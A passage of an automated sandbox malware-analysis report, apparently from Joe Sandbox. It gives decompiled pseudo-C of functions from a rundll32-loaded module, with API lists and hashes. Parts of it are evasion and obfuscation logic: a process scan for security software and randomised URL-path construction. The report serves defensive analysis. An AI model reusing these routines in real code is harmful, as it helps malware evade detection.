                                                  						_t16 =  &(_t39[1]); // 0x5
                                                  						_t23 = _t16;
                                                  						if( *_t16 != 0) {
                                                  							E04B3A022(_t23);
                                                  						}
                                                  					}
                                                  					return _t38;
                                                  				}
                                                  				if(E04B3A72D(0x40,  &_v16) != 0) {
                                                  					_v16 = 0;
                                                  				}
                                                  				_t40 = CreateEventA(0x4b3d2a8, 1, 0,  *0x4b3d344);
                                                  				if(_t40 != 0) {
                                                  					SetEvent(_t40);
                                                  					Sleep(0xbb8);
                                                  					CloseHandle(_t40);
                                                  				}
                                                  				_push( &_v32);
                                                  				if(_a12 == 0) {
                                                  					_t29 = E04B38A51(_t36);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_t29 = E04B317D5(_t36);
                                                  				}
                                                  				_t41 = _v16;
                                                  				_t38 = _t29;
                                                  				if(_v16 != 0) {
                                                  					E04B31F99(_t41);
                                                  				}
                                                  				if(_t38 != 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					_t39 = _a8;
                                                  					_t38 = E04B342EA( &_v32, _t39);
                                                  					goto L13;
                                                  				}
                                                  			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(04B3D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,04B36880,?,00000001,?), ref: 04B33C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,04B36880,?,00000001,?,00000002,?,?,04B32417,?), ref: 04B33C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,04B36880,?,00000001,?,00000002,?,?,04B32417,?), ref: 04B33C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,04B36880,?,00000001,?,00000002,?,?,04B32417,?), ref: 04B33C61
                                                    • Part of subcall function 04B38A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,04B33C81,?,04B33C81,?,?,?,?,?,04B33C81,?), ref: 04B38B2B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: c8af90ad5ddf4536dd0f58b6a4a8e3cc6118f07163bf06eb4541a1660004cc47
                                                  • Instruction ID: 796bdb19c400e08963bae003c9698d53536736301eab29ffdf19e1ba20a081d4
                                                  • Opcode Fuzzy Hash: c8af90ad5ddf4536dd0f58b6a4a8e3cc6118f07163bf06eb4541a1660004cc47
                                                  • Instruction Fuzzy Hash: E121A473900209ABDB10AFF688848EFB7BDEB44656B4545A5EE11A7100D738FD458BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E04B31A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _t26;
                                                  				intOrPtr* _t28;
                                                  				intOrPtr _t31;
                                                  				intOrPtr* _t32;
                                                  				void* _t39;
                                                  				int _t46;
                                                  				intOrPtr* _t47;
                                                  				int _t48;
                                                  
                                                  				_t47 = __eax;
                                                  				_push( &_v12);
                                                  				_push(__eax);
                                                  				_t39 = 0;
                                                  				_t46 = 0;
                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                  				_v8 = _t26;
                                                  				if(_t26 < 0) {
                                                  					L13:
                                                  					return _v8;
                                                  				}
                                                  				if(_v12 == 0) {
                                                  					Sleep(0xc8);
                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                  				}
                                                  				if(_v8 >= _t39) {
                                                  					_t28 = _v12;
                                                  					if(_t28 != 0) {
                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                  						_v8 = _t31;
                                                  						if(_t31 >= 0) {
                                                  							_t46 = lstrlenW(_v16);
                                                  							if(_t46 != 0) {
                                                  								_t46 = _t46 + 1;
                                                  								_t48 = _t46 + _t46;
                                                  								_t39 = E04B32049(_t48);
                                                  								if(_t39 == 0) {
                                                  									_v8 = 0x8007000e;
                                                  								} else {
                                                  									memcpy(_t39, _v16, _t48);
                                                  								}
                                                  								__imp__#6(_v16);
                                                  							}
                                                  						}
                                                  						_t32 = _v12;
                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                  					}
                                                  					 *_a4 = _t39;
                                                  					 *_a8 = _t46 + _t46;
                                                  				}
                                                  				goto L13;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 74ada3d885bf1eec13aac1d74ad7a2b1952c6cfa3f2ae3eed98a00c051040389
                                                  • Instruction ID: 6bae12b080ef7d79066ba6d08e3434eccf455bef083562b806b9fb2295e420a2
                                                  • Opcode Fuzzy Hash: 74ada3d885bf1eec13aac1d74ad7a2b1952c6cfa3f2ae3eed98a00c051040389
                                                  • Instruction Fuzzy Hash: 71213075A00209EFDB11DFA9D88499EBBB9FF49316B1481E9E905E7210FB30AA45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E04B3788B(unsigned int __eax, void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _t21;
                                                  				signed short _t23;
                                                  				char* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				unsigned int _t33;
                                                  				void* _t37;
                                                  				unsigned int _t38;
                                                  				void* _t41;
                                                  				void* _t42;
                                                  				int _t45;
                                                  				void* _t46;
                                                  
                                                  				_t42 = __eax;
                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                  				_t38 = __eax;
                                                  				_t30 = RtlAllocateHeap( *0x4b3d238, 0, (__eax >> 3) + __eax + 1);
                                                  				_v12 = _t30;
                                                  				if(_t30 != 0) {
                                                  					_v8 = _t42;
                                                  					do {
                                                  						_t33 = 0x18;
                                                  						if(_t38 <= _t33) {
                                                  							_t33 = _t38;
                                                  						}
                                                  						_t21 =  *0x4b3d250; // 0x6a8ac61e
                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                  						 *0x4b3d250 = _t23;
                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                  						memcpy(_t30, _v8, _t45);
                                                  						_v8 = _v8 + _t45;
                                                  						_t27 = _t30 + _t45;
                                                  						_t38 = _t38 - _t45;
                                                  						_t46 = _t46 + 0xc;
                                                  						 *_t27 = 0x2f;
                                                  						_t13 = _t27 + 1; // 0x1
                                                  						_t30 = _t13;
                                                  					} while (_t38 > 8);
                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                  				}
                                                  				return _v12;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04B3839A,00000000,?,?,04B3A428,?,06AF95B0), ref: 04B37896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B378AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04B3839A,00000000,?,?,04B3A428,?,06AF95B0), ref: 04B378F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 04B37913
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 547af6ce49e970f96a9174037074b8ebbd41f5d100f13d036e1e2a49f3b1650b
                                                  • Instruction ID: 843ead2e614d8e9f750f3f46837c23ed56a37a57f38440ad85373365217f5164
                                                  • Opcode Fuzzy Hash: 547af6ce49e970f96a9174037074b8ebbd41f5d100f13d036e1e2a49f3b1650b
                                                  • Instruction Fuzzy Hash: 6F11CAB2A00115BFD7108B6BDC84E9EBFAEDB85352F0542A6F50597140EA74AE14C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E04B37A9A(intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v20;
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				void* _t16;
                                                  				char* _t18;
                                                  				void* _t19;
                                                  
                                                  				_t19 = 0x27;
                                                  				_t1 =  &_v20; // 0x74666f53
                                                  				_t18 = 0;
                                                  				E04B36B43(_t8, _t1);
                                                  				_t16 = E04B32049(_t19);
                                                  				if(_t16 != 0) {
                                                  					_t3 =  &_v20; // 0x74666f53
                                                  					_t13 = E04B386D8(_t3, _t16, _a8);
                                                  					if(_a4 != 0) {
                                                  						__imp__(_a4);
                                                  						_t19 = _t13 + 0x27;
                                                  					}
                                                  					_t18 = E04B32049(_t19);
                                                  					if(_t18 != 0) {
                                                  						 *_t18 = 0;
                                                  						if(_a4 != 0) {
                                                  							__imp__(_t18, _a4);
                                                  						}
                                                  						__imp__(_t18, _t16);
                                                  					}
                                                  					E04B39039(_t16);
                                                  				}
                                                  				return _t18;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                    • Part of subcall function 04B386D8: wsprintfA.USER32 ref: 04B38734
                                                  • lstrlen.KERNEL32(04B323E9,00000000,00000000,00000027,00000005,00000000,00000000,04B396DA,74666F53,00000000,04B323E9,04B3D00C,?,04B323E9), ref: 04B37AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B37AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04B37AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: a8d6cfb4cd9a93281d13efc9eceed7c34255ec6772c6cbf2271817d83fada469
                                                  • Instruction ID: f453b4088e72beefe5f3113fbec2937487d15b0decaa0a94dfe9717b3e1e3b92
                                                  • Opcode Fuzzy Hash: a8d6cfb4cd9a93281d13efc9eceed7c34255ec6772c6cbf2271817d83fada469
                                                  • Instruction Fuzzy Hash: 4B01A772100215B7DB127BB79C84EEF7B79DF84247F0484A2F50556100EB799A49C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E04B3757F() {
                                                  				char _v264;
                                                  				void* _v300;
                                                  				int _t8;
                                                  				intOrPtr _t9;
                                                  				int _t15;
                                                  				void* _t17;
                                                  
                                                  				_t15 = 0;
                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                  				if(_t17 != 0) {
                                                  					_t8 = Process32First(_t17,  &_v300);
                                                  					while(_t8 != 0) {
                                                  						_t9 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t2 = _t9 + 0x4b3ee54; // 0x73617661
                                                  						_push( &_v264);
                                                  						if( *0x4b3d0fc() != 0) {
                                                  							_t15 = 1;
                                                  						} else {
                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						CloseHandle(_t17);
                                                  						goto L8;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L8:
                                                  				return _t15;
                                                  			}

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04B3758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 04B375A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 04B375CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 04B375DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 748a3ea80ce79bdbe3544b5402363096a2ab792e214ea58be0e0cc189508c17b
                                                  • Instruction ID: 3dcc61e566c2519fe6dfaa60cc70ea91e23265c2e9867aa810a83e2cb073817c
                                                  • Opcode Fuzzy Hash: 748a3ea80ce79bdbe3544b5402363096a2ab792e214ea58be0e0cc189508c17b
                                                  • Instruction Fuzzy Hash: B2F096B26051295ADB20A7779C48DEB36ECDBC4617F0140E2F905D3000EF34ED494AB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04B37C61(void* __esi) {
                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  
                                                  				_v4 = 0;
                                                  				memset(__esi, 0, 0x38);
                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                  				 *(__esi + 0x1c) = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                  					 *(__esi + 0x20) = _t10;
                                                  					if(_t10 == 0) {
                                                  						CloseHandle( *(__esi + 0x1c));
                                                  					} else {
                                                  						_v4 = 1;
                                                  					}
                                                  				}
                                                  				return _v4;
                                                  			}

                                                  APIs
                                                  • memset.NTDLL ref: 04B37C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04B37C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04B37C91
                                                  • CloseHandle.KERNEL32(?), ref: 04B37CA3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 0b6b41327900ca13487549bb22fa7a93f0e4fd3606e0c9d013b1a7b32014d88a
                                                  • Instruction ID: e24800cf00e83df4504aac24fbf5cb55d9f8eb52ba7de860d3b4c1ca9acc89df
                                                  • Opcode Fuzzy Hash: 0b6b41327900ca13487549bb22fa7a93f0e4fd3606e0c9d013b1a7b32014d88a
                                                  • Instruction Fuzzy Hash: 4AF0DAF5104308AFE2105F67DCC482BBBACEB852DAB51896EB04692541DA36E8099AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E04B375E9(void** __esi) {
                                                  				char* _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				void* _t8;
                                                  				intOrPtr _t11;
                                                  				void* _t12;
                                                  				void** _t14;
                                                  
                                                  				_t14 = __esi;
                                                  				_t4 =  *0x4b3d32c; // 0x6af95b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
                                                  					_t6 =  *0x4b3d32c; // 0x6af95b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t8 =  *_t14;
                                                  				if(_t8 != 0 && _t8 != 0x4b3d030) {
                                                  					HeapFree( *0x4b3d238, 0, _t8);
                                                  				}
                                                  				_t14[1] = E04B394A9(_v0, _t14);
                                                  				_t11 =  *0x4b3d32c; // 0x6af95b0
                                                  				_t12 = _t11 + 0x40;
                                                  				__imp__(_t12);
                                                  				return _t12;
                                                  			}

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B375F2
                                                  • Sleep.KERNEL32(0000000A,?,04B323DE), ref: 04B375FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,04B323DE), ref: 04B37624
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B37640
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 9a38d80e260f6485f27133617256bb044460d9e4eea0cc19d9120c7ac7a9040a
                                                  • Instruction ID: d0dbdb1e6f81f80ed1b717a52ec517e1ef5b39d7ba9f46edf7aecb5f650b3b82
                                                  • Opcode Fuzzy Hash: 9a38d80e260f6485f27133617256bb044460d9e4eea0cc19d9120c7ac7a9040a
                                                  • Instruction Fuzzy Hash: 40F0B7B1600281DBE7149BBBD998A197BA8EB14743F04C446F842E7250D679EC008A39
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04B3970F() {
                                                  				void* _t1;
                                                  				intOrPtr _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t11;
                                                  
                                                  				_t1 =  *0x4b3d26c; // 0x31c
                                                  				if(_t1 == 0) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				SetEvent(_t1);
                                                  				_t11 = 0x7fffffff;
                                                  				while(1) {
                                                  					SleepEx(0x64, 1);
                                                  					_t5 =  *0x4b3d2b8; // 0x0
                                                  					if(_t5 == 0) {
                                                  						break;
                                                  					}
                                                  					_t11 = _t11 - 0x64;
                                                  					if(_t11 > 0) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t6 =  *0x4b3d26c; // 0x31c
                                                  				if(_t6 != 0) {
                                                  					CloseHandle(_t6);
                                                  				}
                                                  				_t7 =  *0x4b3d238; // 0x6700000
                                                  				if(_t7 != 0) {
                                                  					HeapDestroy(_t7);
                                                  				}
                                                  				goto L8;
                                                  			}

                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,04B38099), ref: 04B3971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 04B39729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 04B3974A
                                                  • HeapDestroy.KERNEL32(06700000), ref: 04B3975A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 2123223119069690cc4104ba038d0edec02777fe4d133f245905f3b3b7217e6d
                                                  • Instruction ID: b685a76c9a67575e08780c463068edc0eba8fc5b437fac93e9ad0ee1690b9ec7
                                                  • Opcode Fuzzy Hash: 2123223119069690cc4104ba038d0edec02777fe4d133f245905f3b3b7217e6d
                                                  • Instruction Fuzzy Hash: 00F01276705310A7EB10AF77DD88B0A7BACEB00753B040651B814E72C0DBB8EC409570
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E04B3A5D6() {
                                                  				void* _v0;
                                                  				void** _t3;
                                                  				void** _t5;
                                                  				void** _t7;
                                                  				void** _t8;
                                                  				void* _t10;
                                                  
                                                  				_t3 =  *0x4b3d32c; // 0x6af95b0
                                                  				__imp__( &(_t3[0x10]));
                                                  				while(1) {
                                                  					_t5 =  *0x4b3d32c; // 0x6af95b0
                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t7 =  *0x4b3d32c; // 0x6af95b0
                                                  				_t10 =  *_t7;
                                                  				if(_t10 != 0 && _t10 != 0x4b3e836) {
                                                  					HeapFree( *0x4b3d238, 0, _t10);
                                                  					_t7 =  *0x4b3d32c; // 0x6af95b0
                                                  				}
                                                  				 *_t7 = _v0;
                                                  				_t8 =  &(_t7[0x10]);
                                                  				__imp__(_t8);
                                                  				return _t8;
                                                  			}

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B3A5DF
                                                  • Sleep.KERNEL32(0000000A,?,04B323DE), ref: 04B3A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,04B323DE), ref: 04B3A617
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B3A62C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: f3336fd3734725c6d25140d598215f2ff59640dd418e4e174d6dbaf4e263667e
                                                  • Instruction ID: 3b4b295671f2f5d936ea294dad7c05e2e8b23c9e526e11417cdfd4eb6fa52187
                                                  • Opcode Fuzzy Hash: f3336fd3734725c6d25140d598215f2ff59640dd418e4e174d6dbaf4e263667e
                                                  • Instruction Fuzzy Hash: 9DF06275A002409BE7188F7BD869E197BB9EB08743F55805AF942EB250D639EC00DA35
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E04B37F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                  				intOrPtr* _v8;
                                                  				void* _t17;
                                                  				intOrPtr* _t22;
                                                  				void* _t27;
                                                  				char* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  				int _t42;
                                                  
                                                  				_t17 = __eax;
                                                  				_t37 = 0;
                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                  				_t2 = _t17 + 1; // 0x1
                                                  				_t28 = _t2;
                                                  				_t34 = E04B32049(_t2);
                                                  				if(_t34 != 0) {
                                                  					_t30 = E04B32049(_t28);
                                                  					if(_t30 == 0) {
                                                  						E04B39039(_t34);
                                                  					} else {
                                                  						_t39 = _a4;
                                                  						_t22 = E04B3A911(_t39);
                                                  						_v8 = _t22;
                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                  							_a4 = _t39;
                                                  						} else {
                                                  							_t26 = _t22 + 2;
                                                  							_a4 = _t22 + 2;
                                                  							_t22 = E04B3A911(_t26);
                                                  							_v8 = _t22;
                                                  						}
                                                  						if(_t22 == 0) {
                                                  							__imp__(_t34, _a4);
                                                  							 *_t30 = 0x2f;
                                                  							 *((char*)(_t30 + 1)) = 0;
                                                  						} else {
                                                  							_t42 = _t22 - _a4;
                                                  							memcpy(_t34, _a4, _t42);
                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                  							__imp__(_t30, _v8);
                                                  						}
                                                  						 *_a8 = _t34;
                                                  						_t37 = 1;
                                                  						 *_a12 = _t30;
                                                  					}
                                                  				}
                                                  				return _t37;
			}

Instruction address range: 0x04b37f27 - 0x04b37fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?,?,00000000), ref: 04B37F33
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                    • Part of subcall function 04B3A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04B37F61,00000000,00000001,00000001,?,?,04B315A4,?,?,?,?,00000102), ref: 04B3A91F
                                                    • Part of subcall function 04B3A911: StrChrA.SHLWAPI(?,0000003F,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?,?,00000000,00000000), ref: 04B3A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?), ref: 04B37F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B37FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B37FAD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 719ce9cf640b6a6eac04357e8ff99b38ba75acacf8e3a1f7a970470e539300b3
                                                  • Instruction ID: f58426325153b714442f05af2a4eda764ae654eb6ee28eb4cfb19d688f8d82fe
                                                  • Opcode Fuzzy Hash: 719ce9cf640b6a6eac04357e8ff99b38ba75acacf8e3a1f7a970470e539300b3
                                                  • Instruction Fuzzy Hash: 7E21A5B2504295FBCB129FB6D844A9E7FF9EF45246F1580E5F9059B201DA35E90087A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04B37CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				void* _v8;
                                                  				void* _t18;
                                                  				int _t25;
                                                  				int _t29;
                                                  				int _t34;
                                                  
                                                  				_t29 = lstrlenW(_a4);
                                                  				_t25 = lstrlenW(_a8);
                                                  				_t18 = E04B32049(_t25 + _t29 + _t25 + _t29 + 2);
